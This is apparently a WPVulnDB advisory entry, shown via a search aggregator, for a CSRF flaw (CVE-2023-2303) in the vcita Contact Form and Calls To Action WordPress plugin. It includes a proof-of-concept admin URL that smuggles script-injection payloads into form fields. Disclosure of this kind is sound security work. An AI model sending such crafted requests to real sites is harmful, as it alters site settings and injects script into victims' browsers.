Lucene search
WpvulndbWPEX-ID:AAA589A1-2CE6-4D1A-9FAC-BC16272A0AABHistoryJun 02, 2023 - 12:00 a.m.
Contact Form and Calls To Action by vcita <= 2.7.1 - Settings Update Via CSRF
2023-06-0200:00:00
wpvulndb
79
vcita
csrf
exploit
security
update
settings
EPSS
0.001
Percentile
39.3%
The plugin does not protect its settings page against CSRF attacks, allowing an unauthenticated attacker to change the plugin’s settings, and on older versions (<= 2.6.4), inject arbitrary web-scripts, by tricking a logged in user with the contributor role or higher to click a link.
https://example.com/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>Related
cve
cve
CVE-2023-2303
2023-06-03 05:15:09
wpvulndb
wpvulndb
nvd
nvd
CVE-2023-2303
2023-06-03 05:15:09
cvelist
cvelist
CVE-2023-2303
2023-06-03 04:35:13
prion
prion
Cross site request forgery (csrf)
2023-06-03 05:15:00
wordfence
wordfence